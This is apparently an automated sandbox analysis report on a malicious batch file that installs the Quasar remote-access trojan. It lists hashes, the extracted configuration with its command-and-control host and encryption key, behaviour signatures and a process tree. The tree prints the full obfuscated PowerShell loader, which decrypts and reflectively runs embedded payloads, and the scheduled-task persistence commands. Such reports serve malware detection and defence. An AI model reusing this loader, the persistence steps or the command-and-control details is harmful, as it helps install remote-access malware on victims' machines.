Analysis
-
max time kernel
209s -
max time network
211s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
21-04-2024 01:41
Static task
static1
General
-
Target
Uni.bat
-
Size
1.8MB
-
MD5
14516087f9549022d5582272910428b1
-
SHA1
53324370839fa1c07bfa42cf7cb3039513805d42
-
SHA256
745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
-
SHA512
cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
-
SSDEEP
24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy
Malware Config
Extracted
quasar
1.4.1
SLAVE
uk2.localto.net:39077
cc0a2b76-665e-4e16-b318-5ee02270fbcd
-
encryption_key
D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
-
install_name
UpdateHost.exe
-
log_directory
Error Logs
-
reconnect_delay
3000
-
startup_key
WOS64
-
subdirectory
Windows
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3600-52-0x000001BCA91F0000-0x000001BCA9514000-memory.dmp family_quasar -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
UpdateHost.exepid process 440 UpdateHost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exeUpdateHost.exepid process 4528 powershell.exe 4528 powershell.exe 4120 powershell.exe 4120 powershell.exe 3600 powershell.exe 3600 powershell.exe 440 UpdateHost.exe 440 UpdateHost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4528 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeIncreaseQuotaPrivilege 4120 powershell.exe Token: SeSecurityPrivilege 4120 powershell.exe Token: SeTakeOwnershipPrivilege 4120 powershell.exe Token: SeLoadDriverPrivilege 4120 powershell.exe Token: SeSystemProfilePrivilege 4120 powershell.exe Token: SeSystemtimePrivilege 4120 powershell.exe Token: SeProfSingleProcessPrivilege 4120 powershell.exe Token: SeIncBasePriorityPrivilege 4120 powershell.exe Token: SeCreatePagefilePrivilege 4120 powershell.exe Token: SeBackupPrivilege 4120 powershell.exe Token: SeRestorePrivilege 4120 powershell.exe Token: SeShutdownPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeSystemEnvironmentPrivilege 4120 powershell.exe Token: SeRemoteShutdownPrivilege 4120 powershell.exe Token: SeUndockPrivilege 4120 powershell.exe Token: SeManageVolumePrivilege 4120 powershell.exe Token: 33 4120 powershell.exe Token: 34 4120 powershell.exe Token: 35 4120 powershell.exe Token: 36 4120 powershell.exe Token: SeIncreaseQuotaPrivilege 4120 powershell.exe Token: SeSecurityPrivilege 4120 powershell.exe Token: SeTakeOwnershipPrivilege 4120 powershell.exe Token: SeLoadDriverPrivilege 4120 powershell.exe Token: SeSystemProfilePrivilege 4120 powershell.exe Token: SeSystemtimePrivilege 4120 powershell.exe Token: SeProfSingleProcessPrivilege 4120 powershell.exe Token: SeIncBasePriorityPrivilege 4120 powershell.exe Token: SeCreatePagefilePrivilege 4120 powershell.exe Token: SeBackupPrivilege 4120 powershell.exe Token: SeRestorePrivilege 4120 powershell.exe Token: SeShutdownPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeSystemEnvironmentPrivilege 4120 powershell.exe Token: SeRemoteShutdownPrivilege 4120 powershell.exe Token: SeUndockPrivilege 4120 powershell.exe Token: SeManageVolumePrivilege 4120 powershell.exe Token: 33 4120 powershell.exe Token: 34 4120 powershell.exe Token: 35 4120 powershell.exe Token: 36 4120 powershell.exe Token: SeIncreaseQuotaPrivilege 4120 powershell.exe Token: SeSecurityPrivilege 4120 powershell.exe Token: SeTakeOwnershipPrivilege 4120 powershell.exe Token: SeLoadDriverPrivilege 4120 powershell.exe Token: SeSystemProfilePrivilege 4120 powershell.exe Token: SeSystemtimePrivilege 4120 powershell.exe Token: SeProfSingleProcessPrivilege 4120 powershell.exe Token: SeIncBasePriorityPrivilege 4120 powershell.exe Token: SeCreatePagefilePrivilege 4120 powershell.exe Token: SeBackupPrivilege 4120 powershell.exe Token: SeRestorePrivilege 4120 powershell.exe Token: SeShutdownPrivilege 4120 powershell.exe Token: SeDebugPrivilege 4120 powershell.exe Token: SeSystemEnvironmentPrivilege 4120 powershell.exe Token: SeRemoteShutdownPrivilege 4120 powershell.exe Token: SeUndockPrivilege 4120 powershell.exe Token: SeManageVolumePrivilege 4120 powershell.exe Token: 33 4120 powershell.exe Token: 34 4120 powershell.exe Token: 35 4120 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 1216 wrote to memory of 4528 1216 cmd.exe powershell.exe PID 1216 wrote to memory of 4528 1216 cmd.exe powershell.exe PID 4528 wrote to memory of 4120 4528 powershell.exe powershell.exe PID 4528 wrote to memory of 4120 4528 powershell.exe powershell.exe PID 4528 wrote to memory of 4988 4528 powershell.exe WScript.exe PID 4528 wrote to memory of 4988 4528 powershell.exe WScript.exe PID 4988 wrote to memory of 3648 4988 WScript.exe cmd.exe PID 4988 wrote to memory of 3648 4988 WScript.exe cmd.exe PID 3648 wrote to memory of 3600 3648 cmd.exe powershell.exe PID 3648 wrote to memory of 3600 3648 cmd.exe powershell.exe PID 3600 wrote to memory of 1440 3600 powershell.exe schtasks.exe PID 3600 wrote to memory of 1440 3600 powershell.exe schtasks.exe PID 3600 wrote to memory of 440 3600 powershell.exe UpdateHost.exe PID 3600 wrote to memory of 440 3600 powershell.exe UpdateHost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_187_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_187.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_187.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_187.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_187.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_187.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5ee6f5f5e5924783870aeedeccdafe9da
SHA10e12ede20df5ec37f2bf3608ad1bc9b4649450fd
SHA256ebf215446a1b5afa86e8ba4316bc99c6d7918acd595786a31e0e5974f4e0f416
SHA512998bad1b069cb0e7a57edef247421e5d5bc0b4f071bd16e4260367e86ac62053168204abc850365bf6eb4f41b32568bea99eb9afda60e7746eff37e604cbe61f
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfqo0j1f.0i5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Roaming\startup_str_187.batFilesize
1.8MB
MD514516087f9549022d5582272910428b1
SHA153324370839fa1c07bfa42cf7cb3039513805d42
SHA256745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
SHA512cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
-
C:\Users\Admin\AppData\Roaming\startup_str_187.vbsFilesize
115B
MD59464289340f6a8d3c247e0be8974b90f
SHA1976b9e3c071a56260286a02c893e03d5930e33ac
SHA256542afaf3fcca2ab637c5fd367b86194176d86959253ce18f0da7343e9425fafe
SHA512f4df3974dfec6e0725d96ada90d5805829f06a95a93883041b56283a1353a67faafb06afdd061aeecf2a759cc32313bc134fa85338d1c567f38f6b21e04692c5
-
memory/440-70-0x00000173AE440000-0x00000173AE450000-memory.dmpFilesize
64KB
-
memory/440-78-0x00000173AE440000-0x00000173AE450000-memory.dmpFilesize
64KB
-
memory/440-77-0x00000173AE440000-0x00000173AE450000-memory.dmpFilesize
64KB
-
memory/440-76-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmpFilesize
10.8MB
-
memory/440-73-0x00000173C9080000-0x00000173C90F6000-memory.dmpFilesize
472KB
-
memory/440-72-0x00000173C8FB0000-0x00000173C8FF4000-memory.dmpFilesize
272KB
-
memory/440-71-0x00000173AE440000-0x00000173AE450000-memory.dmpFilesize
64KB
-
memory/440-69-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmpFilesize
10.8MB
-
memory/3600-50-0x000001BCA6CF0000-0x000001BCA6D00000-memory.dmpFilesize
64KB
-
memory/3600-74-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmpFilesize
10.8MB
-
memory/3600-51-0x000001BCA6CF0000-0x000001BCA6D00000-memory.dmpFilesize
64KB
-
memory/3600-48-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmpFilesize
10.8MB
-
memory/3600-52-0x000001BCA91F0000-0x000001BCA9514000-memory.dmpFilesize
3.1MB
-
memory/3600-53-0x000001BCA6CF0000-0x000001BCA6D00000-memory.dmpFilesize
64KB
-
memory/4120-30-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmpFilesize
10.8MB
-
memory/4120-27-0x0000026C3F950000-0x0000026C3F960000-memory.dmpFilesize
64KB
-
memory/4120-26-0x0000026C3F950000-0x0000026C3F960000-memory.dmpFilesize
64KB
-
memory/4120-25-0x0000026C3F950000-0x0000026C3F960000-memory.dmpFilesize
64KB
-
memory/4120-24-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmpFilesize
10.8MB
-
memory/4528-54-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmpFilesize
10.8MB
-
memory/4528-10-0x00007FFDFD3D0000-0x00007FFDFDE91000-memory.dmpFilesize
10.8MB
-
memory/4528-5-0x00000228A5E00000-0x00000228A5E22000-memory.dmpFilesize
136KB
-
memory/4528-11-0x00000228A3D50000-0x00000228A3D60000-memory.dmpFilesize
64KB
-
memory/4528-12-0x00000228A5DF0000-0x00000228A5DF8000-memory.dmpFilesize
32KB
-
memory/4528-13-0x00000228A6090000-0x00000228A61E8000-memory.dmpFilesize
1.3MB